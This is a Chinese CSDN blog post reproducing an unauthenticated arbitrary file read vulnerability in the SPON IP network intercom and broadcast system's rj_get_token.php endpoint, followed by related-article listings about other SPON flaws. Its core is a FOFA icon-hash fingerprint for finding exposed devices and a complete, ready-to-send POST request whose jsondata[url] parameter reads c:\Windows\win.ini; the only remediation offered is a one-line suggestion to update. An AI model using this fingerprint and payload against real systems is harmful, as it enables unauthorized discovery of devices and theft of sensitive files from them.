世邦IP网络对讲广播系统 rj_get_token.php接口存在任意文件读取漏洞

最新推荐文章于 2024-07-27 14:51:42 发布
最新推荐文章于 2024-07-27 14:51:42 发布
阅读量441 收藏 12
点赞数 6
分类专栏: 漏洞复现 文章标签: 网络 tcp/ip php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135504212
版权

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统rj_get_token.php接口处存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取敏感文件。

指纹识别

fofa:

icon_hash="-1830859634"

漏洞利用

poc:

POST /php/rj_get_token.php HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

jsondata[url]=c:\Windows\win.ini

在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

3tefanie丶zhou
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SPON世邦 IP网络广播系统 多处文件上传漏洞复现
0xSec
01-08 1633
SPON世邦IP网络广播系统addscenedata.php、uploadjson.php、my_parser.php接口存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。
教学广播系统的破解版
11-22
信息化课堂使用的teachermain的200人破解版,适合原版安装后的破解使用。
IP广播无法登陆服务器系统,数字IP广播系统操作指南
weixin_30800615的博客
07-31 4217
一、 电脑登陆数字IP公共广播系统服务器打开电脑桌面上的”e”图标,在地址栏输入192.168.2.159回车,即可进入网络公共广播系统登录界面,用户名:admin小写,密码:123456.验证码随机输入,然后点击登陆,即进入到了数字ip公共广播系统的服务器的界面。二、 音乐文件上传到数字IP服务器打开资源管理,选择文件管理,铃声媒体库,右边上传媒体,添加音乐,打开并选择音乐,上传音乐即可。三、 ...
局域网语音对系统_IP广播系统停车场解决方案
weixin_39575410的博客
11-14 4106
IP广播系统停车场解决方案一、需求分析及行业痛点需求分析:随着国民经济和社会的发展, 选择坐车出行的民众越来越多。在保护交通安全的同时,也给停车场服务部门提出了更高的要求。人们对停车场系统提出了更高的要求与挑战, 需要停车场系统提高工作效率与服务水平。随着监控中心与站亭对系统业务量增多, 停车场系统语音对系统,对于信息传递管有着重要的作用, 因此它在停车场系统工程项目中应用也较为普...
世邦通信SPON IP网络广播系统rj_get_token.php 任意文件读取漏洞
Keepb1ue的博客
01-10 1979
世邦通信SPON IP网络广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统
世邦 IP网络广播系统 getjson.php接口存在任意文件读取漏洞
3tefanie丶zhou的博客
01-10 796
SPON世邦IP网络广播系统是一种先进的通信解决方案,旨在提供高效的网络广播功能。SPON世邦IP网络广播系统getjson.php接口存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取敏感文件
世邦spon IP网络广播系统任意文件上传漏洞
Keepb1ue的博客
01-09 2306
世邦通信 IP网络广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统
漏洞复现】世邦通信 SPON IP网络广播系统 ping.php 任意命令执行漏洞
凝聚力安全团队
06-21 284
世邦通信 SPON IP网络广播系统 ping.php 存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器。世邦通信 SPON IP网络广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统
漏洞复现】世邦通信 SPON IP网络广播系统 addscenedata.php 任意文件上传漏洞
凝聚力安全团队
06-21 546
世邦通信 SPON IP网络广播系统 addscenedata.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。世邦通信 SPON IP网络广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统
世邦IP网络广播系统演示.ppt
09-28
世邦IP网络广播系统】是由世邦通用数字技术有限公司研发的一款基于IP网络技术的公共广播系统,该公司作为大中华区领先的IP网络公共广播系统提供商,隶属于世邦电子集团,拥有分布在加拿大、中国大陆多个城市的分支...
IP网络(世邦)开发SDK文档Demo及dll&ocx;
11-20
IP网络技术详解——基于世邦SDK的开发实践》 在当今信息化社会中,IP网络系统因其高效、稳定和灵活的特点,被广泛应用于监控、安防、指挥调度等多个领域。本文将深入探讨IP网络的核心技术,并以世邦...
世邦IP配置工具.rar
01-15
世邦IP配置工具》是一款专为IP系统设计的专业配置软件,它集成了丰富的功能,便于用户管理和优化网络设备。在现代通信技术中,IP系统已经成为安全监控、楼宇管理等领域不可或缺的一部分。通过IP...
世邦IP网络公共广播交流培训.pptx
10-12
世邦IP网络公共广播系统详解》 世邦IP网络公共广播系统,是现代音频传播技术的杰出代表,它利用先进的数字技术,将音频信号转化为数据包,在局域网和广域网上进行高效传输,构建了一种全新的双向音频扩声系统。这...
世邦IP网络公共广播交流培训剖析.ppt
12-17
世邦IP网络公共广播交流培训剖析.ppt
世邦IP网络广播系统 uploadjson.php接口存在任意文件上传漏洞
3tefanie丶zhou的博客
01-10 851
SPON世邦IP网络广播系统是一种先进的通信解决方案,旨在提供高效的网络广播功能。SPON世邦IP网络广播系统 uploadjson.php接口存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 246
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络编程套接字socket
安权_code的博客
07-23 953
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
S5730举例
最新发布
jjjxxxhhh123的博客
07-27 622
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
世邦IP网络内部通信系统-高效银行对解决方案
"IP网络内部通信系统-对方案,主要应用于自助银行和金库,由世邦通信技术有限公司提供,包含多种IP网络终端和核心设备,旨在解决传统对系统的局限性,实现远程、清晰且可靠的内部通信。" IP网络内部通信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值